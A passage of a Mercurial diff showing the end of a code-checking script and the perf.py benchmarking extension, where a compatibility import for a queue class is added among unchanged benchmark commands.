707 708 parser.add_option("-w", "--warnings", action="store_true",
708 709 help="include warning-level checks")
709 710 parser.add_option("-p", "--per-file", type="int",
710 711 help="max warnings per file")
711 712 parser.add_option("-b", "--blame", action="store_true",
712 713 help="use annotate to generate blame info")
713 714 parser.add_option("", "--debug", action="store_true",
714 715 help="show debug information")
715 716 parser.add_option("", "--nolineno", action="store_false",
716 717 dest='lineno', help="don't show line numbers")
717 718
718 719 parser.set_defaults(per_file=15, warnings=False, blame=False, debug=False,
719 720 lineno=True)
720 721 (options, args) = parser.parse_args()
721 722
722 723 if len(args) == 0:
723 724 check = glob.glob("*")
724 725 elif args == ['-']:
725 726 # read file list from stdin
726 727 check = sys.stdin.read().splitlines()
727 728 else:
728 729 check = args
729 730
730 731 _preparepats()
731 732
732 733 ret = 0
733 734 for f in check:
734 735 if not checkfile(f, maxerr=options.per_file, warnings=options.warnings,
735 736 blame=options.blame, debug=options.debug,
736 737 lineno=options.lineno):
737 738 ret = 1
738 739 return ret
739 740
740 741 if __name__ == "__main__":
741 742 sys.exit(main())
@@ -1,1764 +1,1774 b''
1 1 # perf.py - performance test routines
2 2 '''helper extension to measure performance'''
3 3
4 4 # "historical portability" policy of perf.py:
5 5 #
6 6 # We have to do:
7 7 # - make perf.py "loadable" with as wide Mercurial version as possible
8 8 # This doesn't mean that perf commands work correctly with that Mercurial.
9 9 # BTW, perf.py itself has been available since 1.1 (or eb240755386d).
10 10 # - make historical perf command work correctly with as wide Mercurial
11 11 # version as possible
12 12 #
13 13 # We have to do, if possible with reasonable cost:
14 14 # - make recent perf command for historical feature work correctly
15 15 # with early Mercurial
16 16 #
17 17 # We don't have to do:
18 18 # - make perf command for recent feature work correctly with early
19 19 # Mercurial
20 20
21 21 from __future__ import absolute_import
22 22 import functools
23 23 import gc
24 24 import os
25 25 import random
26 26 import struct
27 27 import sys
28 28 import threading
29 29 import time
30 30 from mercurial import (
31 31 changegroup,
32 32 cmdutil,
33 33 commands,
34 34 copies,
35 35 error,
36 36 extensions,
37 37 mdiff,
38 38 merge,
39 39 revlog,
40 40 util,
41 41 )
42 42
43 43 # for "historical portability":
44 44 # try to import modules separately (in dict order), and ignore
45 45 # failure, because these aren't available with early Mercurial
46 46 try:
47 47 from mercurial import branchmap # since 2.5 (or bcee63733aad)
48 48 except ImportError:
49 49 pass
50 50 try:
51 51 from mercurial import obsolete # since 2.3 (or ad0d6c2b3279)
52 52 except ImportError:
53 53 pass
54 54 try:
55 55 from mercurial import registrar # since 3.7 (or 37d50250b696)
56 56 dir(registrar) # forcibly load it
57 57 except ImportError:
58 58 registrar = None
59 59 try:
60 60 from mercurial import repoview # since 2.5 (or 3a6ddacb7198)
61 61 except ImportError:
62 62 pass
63 63 try:
64 64 from mercurial import scmutil # since 1.9 (or 8b252e826c68)
65 65 except ImportError:
66 66 pass
67 67 try:
68 68 from mercurial import pycompat
69 69 getargspec = pycompat.getargspec # added to module after 4.5
70 70 except (ImportError, AttributeError):
71 71 import inspect
72 72 getargspec = inspect.getargspec
73 73
74 try:
75 # 4.7+
76 queue = pycompat.queue.Queue
77 except (AttributeError, ImportError):
78 # <4.7.
79 try:
80 queue = pycompat.queue
81 except (AttributeError, ImportError):
82 queue = util.queue
83
74 84 # for "historical portability":
75 85 # define util.safehasattr forcibly, because util.safehasattr has been
76 86 # available since 1.9.3 (or 94b200a11cf7)
77 87 _undefined = object()
78 88 def safehasattr(thing, attr):
79 89 return getattr(thing, attr, _undefined) is not _undefined
80 90 setattr(util, 'safehasattr', safehasattr)
81 91
82 92 # for "historical portability":
83 93 # define util.timer forcibly, because util.timer has been available
84 94 # since ae5d60bb70c9
85 95 if safehasattr(time, 'perf_counter'):
86 96 util.timer = time.perf_counter
87 97 elif os.name == 'nt':
88 98 util.timer = time.clock
89 99 else:
90 100 util.timer = time.time
91 101
92 102 # for "historical portability":
93 103 # use locally defined empty option list, if formatteropts isn't
94 104 # available, because commands.formatteropts has been available since
95 105 # 3.2 (or 7a7eed5176a4), even though formatting itself has been
96 106 # available since 2.2 (or ae5f92e154d3)
97 107 formatteropts = getattr(cmdutil, "formatteropts",
98 108 getattr(commands, "formatteropts", []))
99 109
100 110 # for "historical portability":
101 111 # use locally defined option list, if debugrevlogopts isn't available,
102 112 # because commands.debugrevlogopts has been available since 3.7 (or
103 113 # 5606f7d0d063), even though cmdutil.openrevlog() has been available
104 114 # since 1.9 (or a79fea6b3e77).
105 115 revlogopts = getattr(cmdutil, "debugrevlogopts",
106 116 getattr(commands, "debugrevlogopts", [
107 117 ('c', 'changelog', False, ('open changelog')),
108 118 ('m', 'manifest', False, ('open manifest')),
109 119 ('', 'dir', False, ('open directory manifest')),
110 120 ]))
111 121
112 122 cmdtable = {}
113 123
114 124 # for "historical portability":
115 125 # define parsealiases locally, because cmdutil.parsealiases has been
116 126 # available since 1.5 (or 6252852b4332)
117 127 def parsealiases(cmd):
118 128 return cmd.lstrip("^").split("|")
119 129
120 130 if safehasattr(registrar, 'command'):
121 131 command = registrar.command(cmdtable)
122 132 elif safehasattr(cmdutil, 'command'):
123 133 command = cmdutil.command(cmdtable)
124 134 if 'norepo' not in getargspec(command).args:
125 135 # for "historical portability":
126 136 # wrap original cmdutil.command, because "norepo" option has
127 137 # been available since 3.1 (or 75a96326cecb)
128 138 _command = command
129 139 def command(name, options=(), synopsis=None, norepo=False):
130 140 if norepo:
131 141 commands.norepo += ' %s' % ' '.join(parsealiases(name))
132 142 return _command(name, list(options), synopsis)
133 143 else:
134 144 # for "historical portability":
135 145 # define "@command" annotation locally, because cmdutil.command
136 146 # has been available since 1.9 (or 2daa5179e73f)
137 147 def command(name, options=(), synopsis=None, norepo=False):
138 148 def decorator(func):
139 149 if synopsis:
140 150 cmdtable[name] = func, list(options), synopsis
141 151 else:
142 152 cmdtable[name] = func, list(options)
143 153 if norepo:
144 154 commands.norepo += ' %s' % ' '.join(parsealiases(name))
145 155 return func
146 156 return decorator
147 157
148 158 try:
149 159 import mercurial.registrar
150 160 import mercurial.configitems
151 161 configtable = {}
152 162 configitem = mercurial.registrar.configitem(configtable)
153 163 configitem('perf', 'presleep',
154 164 default=mercurial.configitems.dynamicdefault,
155 165 )
156 166 configitem('perf', 'stub',
157 167 default=mercurial.configitems.dynamicdefault,
158 168 )
159 169 configitem('perf', 'parentscount',
160 170 default=mercurial.configitems.dynamicdefault,
161 171 )
162 172 except (ImportError, AttributeError):
163 173 pass
164 174
165 175 def getlen(ui):
166 176 if ui.configbool("perf", "stub", False):
167 177 return lambda x: 1
168 178 return len
169 179
170 180 def gettimer(ui, opts=None):
171 181 """return a timer function and formatter: (timer, formatter)
172 182
173 183 This function exists to gather the creation of formatter in a single
174 184 place instead of duplicating it in all performance commands."""
175 185
176 186 # enforce an idle period before execution to counteract power management
177 187 # experimental config: perf.presleep
178 188 time.sleep(getint(ui, "perf", "presleep", 1))
179 189
180 190 if opts is None:
181 191 opts = {}
182 192 # redirect all to stderr unless buffer api is in use
183 193 if not ui._buffers:
184 194 ui = ui.copy()
185 195 uifout = safeattrsetter(ui, 'fout', ignoremissing=True)
186 196 if uifout:
187 197 # for "historical portability":
188 198 # ui.fout/ferr have been available since 1.9 (or 4e1ccd4c2b6d)
189 199 uifout.set(ui.ferr)
190 200
191 201 # get a formatter
192 202 uiformatter = getattr(ui, 'formatter', None)
193 203 if uiformatter:
194 204 fm = uiformatter('perf', opts)
195 205 else:
196 206 # for "historical portability":
197 207 # define formatter locally, because ui.formatter has been
198 208 # available since 2.2 (or ae5f92e154d3)
199 209 from mercurial import node
200 210 class defaultformatter(object):
201 211 """Minimized composition of baseformatter and plainformatter
202 212 """
203 213 def __init__(self, ui, topic, opts):
204 214 self._ui = ui
205 215 if ui.debugflag:
206 216 self.hexfunc = node.hex
207 217 else:
208 218 self.hexfunc = node.short
209 219 def __nonzero__(self):
210 220 return False
211 221 __bool__ = __nonzero__
212 222 def startitem(self):
213 223 pass
214 224 def data(self, **data):
215 225 pass
216 226 def write(self, fields, deftext, *fielddata, **opts):
217 227 self._ui.write(deftext % fielddata, **opts)
218 228 def condwrite(self, cond, fields, deftext, *fielddata, **opts):
219 229 if cond:
220 230 self._ui.write(deftext % fielddata, **opts)
221 231 def plain(self, text, **opts):
222 232 self._ui.write(text, **opts)
223 233 def end(self):
224 234 pass
225 235 fm = defaultformatter(ui, 'perf', opts)
226 236
227 237 # stub function, runs code only once instead of in a loop
228 238 # experimental config: perf.stub
229 239 if ui.configbool("perf", "stub", False):
230 240 return functools.partial(stub_timer, fm), fm
231 241 return functools.partial(_timer, fm), fm
232 242
233 243 def stub_timer(fm, func, title=None):
234 244 func()
235 245
236 246 def _timer(fm, func, title=None):
237 247 gc.collect()
238 248 results = []
239 249 begin = util.timer()
240 250 count = 0
241 251 while True:
242 252 ostart = os.times()
243 253 cstart = util.timer()
244 254 r = func()
245 255 cstop = util.timer()
246 256 ostop = os.times()
247 257 count += 1
248 258 a, b = ostart, ostop
249 259 results.append((cstop - cstart, b[0] - a[0], b[1]-a[1]))
250 260 if cstop - begin > 3 and count >= 100:
251 261 break
252 262 if cstop - begin > 10 and count >= 3:
253 263 break
254 264
255 265 fm.startitem()
256 266
257 267 if title:
258 268 fm.write('title', '! %s\n', title)
259 269 if r:
260 270 fm.write('result', '! result: %s\n', r)
261 271 m = min(results)
262 272 fm.plain('!')
263 273 fm.write('wall', ' wall %f', m[0])
264 274 fm.write('comb', ' comb %f', m[1] + m[2])
265 275 fm.write('user', ' user %f', m[1])
266 276 fm.write('sys', ' sys %f', m[2])
267 277 fm.write('count', ' (best of %d)', count)
268 278 fm.plain('\n')
269 279
270 280 # utilities for historical portability
271 281
272 282 def getint(ui, section, name, default):
273 283 # for "historical portability":
274 284 # ui.configint has been available since 1.9 (or fa2b596db182)
275 285 v = ui.config(section, name, None)
276 286 if v is None:
277 287 return default
278 288 try:
279 289 return int(v)
280 290 except ValueError:
281 291 raise error.ConfigError(("%s.%s is not an integer ('%s')")
282 292 % (section, name, v))
283 293
284 294 def safeattrsetter(obj, name, ignoremissing=False):
285 295 """Ensure that 'obj' has 'name' attribute before subsequent setattr
286 296
287 297 This function is aborted, if 'obj' doesn't have 'name' attribute
288 298 at runtime. This avoids overlooking removal of an attribute, which
289 299 breaks assumption of performance measurement, in the future.
290 300
291 301 This function returns the object to (1) assign a new value, and
292 302 (2) restore an original value to the attribute.
293 303
294 304 If 'ignoremissing' is true, missing 'name' attribute doesn't cause
295 305 abortion, and this function returns None. This is useful to
296 306 examine an attribute, which isn't ensured in all Mercurial
297 307 versions.
298 308 """
299 309 if not util.safehasattr(obj, name):
300 310 if ignoremissing:
301 311 return None
302 312 raise error.Abort(("missing attribute %s of %s might break assumption"
303 313 " of performance measurement") % (name, obj))
304 314
305 315 origvalue = getattr(obj, name)
306 316 class attrutil(object):
307 317 def set(self, newvalue):
308 318 setattr(obj, name, newvalue)
309 319 def restore(self):
310 320 setattr(obj, name, origvalue)
311 321
312 322 return attrutil()
313 323
314 324 # utilities to examine each internal API changes
315 325
316 326 def getbranchmapsubsettable():
317 327 # for "historical portability":
318 328 # subsettable is defined in:
319 329 # - branchmap since 2.9 (or 175c6fd8cacc)
320 330 # - repoview since 2.5 (or 59a9f18d4587)
321 331 for mod in (branchmap, repoview):
322 332 subsettable = getattr(mod, 'subsettable', None)
323 333 if subsettable:
324 334 return subsettable
325 335
326 336 # bisecting in bcee63733aad::59a9f18d4587 can reach here (both
327 337 # branchmap and repoview modules exist, but subsettable attribute
328 338 # doesn't)
329 339 raise error.Abort(("perfbranchmap not available with this Mercurial"),
330 340 hint="use 2.5 or later")
331 341
332 342 def getsvfs(repo):
333 343 """Return appropriate object to access files under .hg/store
334 344 """
335 345 # for "historical portability":
336 346 # repo.svfs has been available since 2.3 (or 7034365089bf)
337 347 svfs = getattr(repo, 'svfs', None)
338 348 if svfs:
339 349 return svfs
340 350 else:
341 351 return getattr(repo, 'sopener')
342 352
343 353 def getvfs(repo):
344 354 """Return appropriate object to access files under .hg
345 355 """
346 356 # for "historical portability":
347 357 # repo.vfs has been available since 2.3 (or 7034365089bf)
348 358 vfs = getattr(repo, 'vfs', None)
349 359 if vfs:
350 360 return vfs
351 361 else:
352 362 return getattr(repo, 'opener')
353 363
354 364 def repocleartagscachefunc(repo):
355 365 """Return the function to clear tags cache according to repo internal API
356 366 """
357 367 if util.safehasattr(repo, '_tagscache'): # since 2.0 (or 9dca7653b525)
358 368 # in this case, setattr(repo, '_tagscache', None) or so isn't
359 369 # correct way to clear tags cache, because existing code paths
360 370 # expect _tagscache to be a structured object.
361 371 def clearcache():
362 372 # _tagscache has been filteredpropertycache since 2.5 (or
363 373 # 98c867ac1330), and delattr() can't work in such case
364 374 if '_tagscache' in vars(repo):
365 375 del repo.__dict__['_tagscache']
366 376 return clearcache
367 377
368 378 repotags = safeattrsetter(repo, '_tags', ignoremissing=True)
369 379 if repotags: # since 1.4 (or 5614a628d173)
370 380 return lambda : repotags.set(None)
371 381
372 382 repotagscache = safeattrsetter(repo, 'tagscache', ignoremissing=True)
373 383 if repotagscache: # since 0.6 (or d7df759d0e97)
374 384 return lambda : repotagscache.set(None)
375 385
376 386 # Mercurial earlier than 0.6 (or d7df759d0e97) logically reaches
377 387 # this point, but it isn't so problematic, because:
378 388 # - repo.tags of such Mercurial isn't "callable", and repo.tags()
379 389 # in perftags() causes failure soon
380 390 # - perf.py itself has been available since 1.1 (or eb240755386d)
381 391 raise error.Abort(("tags API of this hg command is unknown"))
382 392
383 393 # utilities to clear cache
384 394
385 395 def clearfilecache(repo, attrname):
386 396 unfi = repo.unfiltered()
387 397 if attrname in vars(unfi):
388 398 delattr(unfi, attrname)
389 399 unfi._filecache.pop(attrname, None)
390 400
391 401 # perf commands
392 402
393 403 @command('perfwalk', formatteropts)
394 404 def perfwalk(ui, repo, *pats, **opts):
395 405 timer, fm = gettimer(ui, opts)
396 406 m = scmutil.match(repo[None], pats, {})
397 407 timer(lambda: len(list(repo.dirstate.walk(m, subrepos=[], unknown=True,
398 408 ignored=False))))
399 409 fm.end()
400 410
401 411 @command('perfannotate', formatteropts)
402 412 def perfannotate(ui, repo, f, **opts):
403 413 timer, fm = gettimer(ui, opts)
404 414 fc = repo['.'][f]
405 415 timer(lambda: len(fc.annotate(True)))
406 416 fm.end()
407 417
408 418 @command('perfstatus',
409 419 [('u', 'unknown', False,
410 420 'ask status to look for unknown files')] + formatteropts)
411 421 def perfstatus(ui, repo, **opts):
412 422 #m = match.always(repo.root, repo.getcwd())
413 423 #timer(lambda: sum(map(len, repo.dirstate.status(m, [], False, False,
414 424 # False))))
415 425 timer, fm = gettimer(ui, opts)
416 426 timer(lambda: sum(map(len, repo.status(unknown=opts['unknown']))))
417 427 fm.end()
418 428
419 429 @command('perfaddremove', formatteropts)
420 430 def perfaddremove(ui, repo, **opts):
421 431 timer, fm = gettimer(ui, opts)
422 432 try:
423 433 oldquiet = repo.ui.quiet
424 434 repo.ui.quiet = True
425 435 matcher = scmutil.match(repo[None])
426 436 opts['dry_run'] = True
427 437 timer(lambda: scmutil.addremove(repo, matcher, "", opts))
428 438 finally:
429 439 repo.ui.quiet = oldquiet
430 440 fm.end()
431 441
432 442 def clearcaches(cl):
433 443 # behave somewhat consistently across internal API changes
434 444 if util.safehasattr(cl, 'clearcaches'):
435 445 cl.clearcaches()
436 446 elif util.safehasattr(cl, '_nodecache'):
437 447 from mercurial.node import nullid, nullrev
438 448 cl._nodecache = {nullid: nullrev}
439 449 cl._nodepos = None
440 450
441 451 @command('perfheads', formatteropts)
442 452 def perfheads(ui, repo, **opts):
443 453 timer, fm = gettimer(ui, opts)
444 454 cl = repo.changelog
445 455 def d():
446 456 len(cl.headrevs())
447 457 clearcaches(cl)
448 458 timer(d)
449 459 fm.end()
450 460
451 461 @command('perftags', formatteropts)
452 462 def perftags(ui, repo, **opts):
453 463 import mercurial.changelog
454 464 import mercurial.manifest
455 465 timer, fm = gettimer(ui, opts)
456 466 svfs = getsvfs(repo)
457 467 repocleartagscache = repocleartagscachefunc(repo)
458 468 def t():
459 469 repo.changelog = mercurial.changelog.changelog(svfs)
460 470 repo.manifestlog = mercurial.manifest.manifestlog(svfs, repo)
461 471 repocleartagscache()
462 472 return len(repo.tags())
463 473 timer(t)
464 474 fm.end()
465 475
466 476 @command('perfancestors', formatteropts)
467 477 def perfancestors(ui, repo, **opts):
468 478 timer, fm = gettimer(ui, opts)
469 479 heads = repo.changelog.headrevs()
470 480 def d():
471 481 for a in repo.changelog.ancestors(heads):
472 482 pass
473 483 timer(d)
474 484 fm.end()
475 485
476 486 @command('perfancestorset', formatteropts)
477 487 def perfancestorset(ui, repo, revset, **opts):
478 488 timer, fm = gettimer(ui, opts)
479 489 revs = repo.revs(revset)
480 490 heads = repo.changelog.headrevs()
481 491 def d():
482 492 s = repo.changelog.ancestors(heads)
483 493 for rev in revs:
484 494 rev in s
485 495 timer(d)
486 496 fm.end()
487 497
488 498 @command('perfbookmarks', formatteropts)
489 499 def perfbookmarks(ui, repo, **opts):
490 500 """benchmark parsing bookmarks from disk to memory"""
491 501 timer, fm = gettimer(ui, opts)
492 502 def d():
493 503 clearfilecache(repo, '_bookmarks')
494 504 repo._bookmarks
495 505 timer(d)
496 506 fm.end()
497 507
498 508 @command('perfbundleread', formatteropts, 'BUNDLE')
499 509 def perfbundleread(ui, repo, bundlepath, **opts):
500 510 """Benchmark reading of bundle files.
501 511
502 512 This command is meant to isolate the I/O part of bundle reading as
503 513 much as possible.
504 514 """
505 515 from mercurial import (
506 516 bundle2,
507 517 exchange,
508 518 streamclone,
509 519 )
510 520
511 521 def makebench(fn):
512 522 def run():
513 523 with open(bundlepath, 'rb') as fh:
514 524 bundle = exchange.readbundle(ui, fh, bundlepath)
515 525 fn(bundle)
516 526
517 527 return run
518 528
519 529 def makereadnbytes(size):
520 530 def run():
521 531 with open(bundlepath, 'rb') as fh:
522 532 bundle = exchange.readbundle(ui, fh, bundlepath)
523 533 while bundle.read(size):
524 534 pass
525 535
526 536 return run
527 537
528 538 def makestdioread(size):
529 539 def run():
530 540 with open(bundlepath, 'rb') as fh:
531 541 while fh.read(size):
532 542 pass
533 543
534 544 return run
535 545
536 546 # bundle1
537 547
538 548 def deltaiter(bundle):
539 549 for delta in bundle.deltaiter():
540 550 pass
541 551
542 552 def iterchunks(bundle):
543 553 for chunk in bundle.getchunks():
544 554 pass
545 555
546 556 # bundle2
547 557
548 558 def forwardchunks(bundle):
549 559 for chunk in bundle._forwardchunks():
550 560 pass
551 561
552 562 def iterparts(bundle):
553 563 for part in bundle.iterparts():
554 564 pass
555 565
556 566 def iterpartsseekable(bundle):
557 567 for part in bundle.iterparts(seekable=True):
558 568 pass
559 569
560 570 def seek(bundle):
561 571 for part in bundle.iterparts(seekable=True):
562 572 part.seek(0, os.SEEK_END)
563 573
564 574 def makepartreadnbytes(size):
565 575 def run():
566 576 with open(bundlepath, 'rb') as fh:
567 577 bundle = exchange.readbundle(ui, fh, bundlepath)
568 578 for part in bundle.iterparts():
569 579 while part.read(size):
570 580 pass
571 581
572 582 return run
573 583
574 584 benches = [
575 585 (makestdioread(8192), 'read(8k)'),
576 586 (makestdioread(16384), 'read(16k)'),
577 587 (makestdioread(32768), 'read(32k)'),
578 588 (makestdioread(131072), 'read(128k)'),
579 589 ]
580 590
581 591 with open(bundlepath, 'rb') as fh:
582 592 bundle = exchange.readbundle(ui, fh, bundlepath)
583 593
584 594 if isinstance(bundle, changegroup.cg1unpacker):
585 595 benches.extend([
586 596 (makebench(deltaiter), 'cg1 deltaiter()'),
587 597 (makebench(iterchunks), 'cg1 getchunks()'),
588 598 (makereadnbytes(8192), 'cg1 read(8k)'),
589 599 (makereadnbytes(16384), 'cg1 read(16k)'),
590 600 (makereadnbytes(32768), 'cg1 read(32k)'),
591 601 (makereadnbytes(131072), 'cg1 read(128k)'),
592 602 ])
593 603 elif isinstance(bundle, bundle2.unbundle20):
594 604 benches.extend([
595 605 (makebench(forwardchunks), 'bundle2 forwardchunks()'),
596 606 (makebench(iterparts), 'bundle2 iterparts()'),
597 607 (makebench(iterpartsseekable), 'bundle2 iterparts() seekable'),
598 608 (makebench(seek), 'bundle2 part seek()'),
599 609 (makepartreadnbytes(8192), 'bundle2 part read(8k)'),
600 610 (makepartreadnbytes(16384), 'bundle2 part read(16k)'),
601 611 (makepartreadnbytes(32768), 'bundle2 part read(32k)'),
602 612 (makepartreadnbytes(131072), 'bundle2 part read(128k)'),
603 613 ])
604 614 elif isinstance(bundle, streamclone.streamcloneapplier):
605 615 raise error.Abort('stream clone bundles not supported')
606 616 else:
607 617 raise error.Abort('unhandled bundle type: %s' % type(bundle))
608 618
609 619 for fn, title in benches:
610 620 timer, fm = gettimer(ui, opts)
611 621 timer(fn, title=title)
612 622 fm.end()
613 623
614 624 @command('perfchangegroupchangelog', formatteropts +
615 625 [('', 'version', '02', 'changegroup version'),
616 626 ('r', 'rev', '', 'revisions to add to changegroup')])
617 627 def perfchangegroupchangelog(ui, repo, version='02', rev=None, **opts):
618 628 """Benchmark producing a changelog group for a changegroup.
619 629
620 630 This measures the time spent processing the changelog during a
621 631 bundle operation. This occurs during `hg bundle` and on a server
622 632 processing a `getbundle` wire protocol request (handles clones
623 633 and pull requests).
624 634
625 635 By default, all revisions are added to the changegroup.
626 636 """
627 637 cl = repo.changelog
628 638 revs = [cl.lookup(r) for r in repo.revs(rev or 'all()')]
629 639 bundler = changegroup.getbundler(version, repo)
630 640
631 641 def lookup(node):
632 642 # The real bundler reads the revision in order to access the
633 643 # manifest node and files list. Do that here.
634 644 cl.read(node)
635 645 return node
636 646
637 647 def d():
638 648 for chunk in bundler.group(revs, cl, lookup):
639 649 pass
640 650
641 651 timer, fm = gettimer(ui, opts)
642 652 timer(d)
643 653 fm.end()
644 654
645 655 @command('perfdirs', formatteropts)
646 656 def perfdirs(ui, repo, **opts):
647 657 timer, fm = gettimer(ui, opts)
648 658 dirstate = repo.dirstate
649 659 'a' in dirstate
650 660 def d():
651 661 dirstate.hasdir('a')
652 662 del dirstate._map._dirs
653 663 timer(d)
654 664 fm.end()
655 665
656 666 @command('perfdirstate', formatteropts)
657 667 def perfdirstate(ui, repo, **opts):
658 668 timer, fm = gettimer(ui, opts)
659 669 "a" in repo.dirstate
660 670 def d():
661 671 repo.dirstate.invalidate()
662 672 "a" in repo.dirstate
663 673 timer(d)
664 674 fm.end()
665 675
666 676 @command('perfdirstatedirs', formatteropts)
667 677 def perfdirstatedirs(ui, repo, **opts):
668 678 timer, fm = gettimer(ui, opts)
669 679 "a" in repo.dirstate
670 680 def d():
671 681 repo.dirstate.hasdir("a")
672 682 del repo.dirstate._map._dirs
673 683 timer(d)
674 684 fm.end()
675 685
676 686 @command('perfdirstatefoldmap', formatteropts)
677 687 def perfdirstatefoldmap(ui, repo, **opts):
678 688 timer, fm = gettimer(ui, opts)
679 689 dirstate = repo.dirstate
680 690 'a' in dirstate
681 691 def d():
682 692 dirstate._map.filefoldmap.get('a')
683 693 del dirstate._map.filefoldmap
684 694 timer(d)
685 695 fm.end()
686 696
687 697 @command('perfdirfoldmap', formatteropts)
688 698 def perfdirfoldmap(ui, repo, **opts):
689 699 timer, fm = gettimer(ui, opts)
690 700 dirstate = repo.dirstate
691 701 'a' in dirstate
692 702 def d():
693 703 dirstate._map.dirfoldmap.get('a')
694 704 del dirstate._map.dirfoldmap
695 705 del dirstate._map._dirs
696 706 timer(d)
697 707 fm.end()
698 708
699 709 @command('perfdirstatewrite', formatteropts)
700 710 def perfdirstatewrite(ui, repo, **opts):
701 711 timer, fm = gettimer(ui, opts)
702 712 ds = repo.dirstate
703 713 "a" in ds
704 714 def d():
705 715 ds._dirty = True
706 716 ds.write(repo.currenttransaction())
707 717 timer(d)
708 718 fm.end()
709 719
710 720 @command('perfmergecalculate',
711 721 [('r', 'rev', '.', 'rev to merge against')] + formatteropts)
712 722 def perfmergecalculate(ui, repo, rev, **opts):
713 723 timer, fm = gettimer(ui, opts)
714 724 wctx = repo[None]
715 725 rctx = scmutil.revsingle(repo, rev, rev)
716 726 ancestor = wctx.ancestor(rctx)
717 727 # we don't want working dir files to be stat'd in the benchmark, so prime
718 728 # that cache
719 729 wctx.dirty()
720 730 def d():
721 731 # acceptremote is True because we don't want prompts in the middle of
722 732 # our benchmark
723 733 merge.calculateupdates(repo, wctx, rctx, [ancestor], False, False,
724 734 acceptremote=True, followcopies=True)
725 735 timer(d)
726 736 fm.end()
727 737
728 738 @command('perfpathcopies', [], "REV REV")
729 739 def perfpathcopies(ui, repo, rev1, rev2, **opts):
730 740 timer, fm = gettimer(ui, opts)
731 741 ctx1 = scmutil.revsingle(repo, rev1, rev1)
732 742 ctx2 = scmutil.revsingle(repo, rev2, rev2)
733 743 def d():
734 744 copies.pathcopies(ctx1, ctx2)
735 745 timer(d)
736 746 fm.end()
737 747
738 748 @command('perfphases',
739 749 [('', 'full', False, 'include file reading time too'),
740 750 ], "")
741 751 def perfphases(ui, repo, **opts):
742 752 """benchmark phasesets computation"""
743 753 timer, fm = gettimer(ui, opts)
744 754 _phases = repo._phasecache
745 755 full = opts.get('full')
746 756 def d():
747 757 phases = _phases
748 758 if full:
749 759 clearfilecache(repo, '_phasecache')
750 760 phases = repo._phasecache
751 761 phases.invalidate()
752 762 phases.loadphaserevs(repo)
753 763 timer(d)
754 764 fm.end()
755 765
756 766 @command('perfmanifest', [], 'REV')
757 767 def perfmanifest(ui, repo, rev, **opts):
758 768 timer, fm = gettimer(ui, opts)
759 769 ctx = scmutil.revsingle(repo, rev, rev)
760 770 t = ctx.manifestnode()
761 771 def d():
762 772 repo.manifestlog.clearcaches()
763 773 repo.manifestlog[t].read()
764 774 timer(d)
765 775 fm.end()
766 776
767 777 @command('perfchangeset', formatteropts)
768 778 def perfchangeset(ui, repo, rev, **opts):
769 779 timer, fm = gettimer(ui, opts)
770 780 n = scmutil.revsingle(repo, rev).node()
771 781 def d():
772 782 repo.changelog.read(n)
773 783 #repo.changelog._cache = None
774 784 timer(d)
775 785 fm.end()
776 786
777 787 @command('perfindex', formatteropts)
778 788 def perfindex(ui, repo, **opts):
779 789 import mercurial.revlog
780 790 timer, fm = gettimer(ui, opts)
781 791 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
782 792 n = repo["tip"].node()
783 793 svfs = getsvfs(repo)
784 794 def d():
785 795 cl = mercurial.revlog.revlog(svfs, "00changelog.i")
786 796 cl.rev(n)
787 797 timer(d)
788 798 fm.end()
789 799
790 800 @command('perfstartup', formatteropts)
791 801 def perfstartup(ui, repo, **opts):
792 802 timer, fm = gettimer(ui, opts)
793 803 cmd = sys.argv[0]
794 804 def d():
795 805 if os.name != 'nt':
796 806 os.system("HGRCPATH= %s version -q > /dev/null" % cmd)
797 807 else:
798 808 os.environ['HGRCPATH'] = ' '
799 809 os.system("%s version -q > NUL" % cmd)
800 810 timer(d)
801 811 fm.end()
802 812
803 813 @command('perfparents', formatteropts)
804 814 def perfparents(ui, repo, **opts):
805 815 timer, fm = gettimer(ui, opts)
806 816 # control the number of commits perfparents iterates over
807 817 # experimental config: perf.parentscount
808 818 count = getint(ui, "perf", "parentscount", 1000)
809 819 if len(repo.changelog) < count:
810 820 raise error.Abort("repo needs %d commits for this test" % count)
811 821 repo = repo.unfiltered()
812 822 nl = [repo.changelog.node(i) for i in xrange(count)]
813 823 def d():
814 824 for n in nl:
815 825 repo.changelog.parents(n)
816 826 timer(d)
817 827 fm.end()
818 828
819 829 @command('perfctxfiles', formatteropts)
820 830 def perfctxfiles(ui, repo, x, **opts):
821 831 x = int(x)
822 832 timer, fm = gettimer(ui, opts)
823 833 def d():
824 834 len(repo[x].files())
825 835 timer(d)
826 836 fm.end()
827 837
828 838 @command('perfrawfiles', formatteropts)
829 839 def perfrawfiles(ui, repo, x, **opts):
830 840 x = int(x)
831 841 timer, fm = gettimer(ui, opts)
832 842 cl = repo.changelog
833 843 def d():
834 844 len(cl.read(x)[3])
835 845 timer(d)
836 846 fm.end()
837 847
838 848 @command('perflookup', formatteropts)
839 849 def perflookup(ui, repo, rev, **opts):
840 850 timer, fm = gettimer(ui, opts)
841 851 timer(lambda: len(repo.lookup(rev)))
842 852 fm.end()
843 853
844 854 @command('perfrevrange', formatteropts)
845 855 def perfrevrange(ui, repo, *specs, **opts):
846 856 timer, fm = gettimer(ui, opts)
847 857 revrange = scmutil.revrange
848 858 timer(lambda: len(revrange(repo, specs)))
849 859 fm.end()
850 860
851 861 @command('perfnodelookup', formatteropts)
852 862 def perfnodelookup(ui, repo, rev, **opts):
853 863 timer, fm = gettimer(ui, opts)
854 864 import mercurial.revlog
855 865 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
856 866 n = scmutil.revsingle(repo, rev).node()
857 867 cl = mercurial.revlog.revlog(getsvfs(repo), "00changelog.i")
858 868 def d():
859 869 cl.rev(n)
860 870 clearcaches(cl)
861 871 timer(d)
862 872 fm.end()
863 873
864 874 @command('perflog',
865 875 [('', 'rename', False, 'ask log to follow renames')] + formatteropts)
866 876 def perflog(ui, repo, rev=None, **opts):
867 877 if rev is None:
868 878 rev=[]
869 879 timer, fm = gettimer(ui, opts)
870 880 ui.pushbuffer()
871 881 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
872 882 copies=opts.get('rename')))
873 883 ui.popbuffer()
874 884 fm.end()
875 885
876 886 @command('perfmoonwalk', formatteropts)
877 887 def perfmoonwalk(ui, repo, **opts):
878 888 """benchmark walking the changelog backwards
879 889
880 890 This also loads the changelog data for each revision in the changelog.
881 891 """
882 892 timer, fm = gettimer(ui, opts)
883 893 def moonwalk():
884 894 for i in xrange(len(repo), -1, -1):
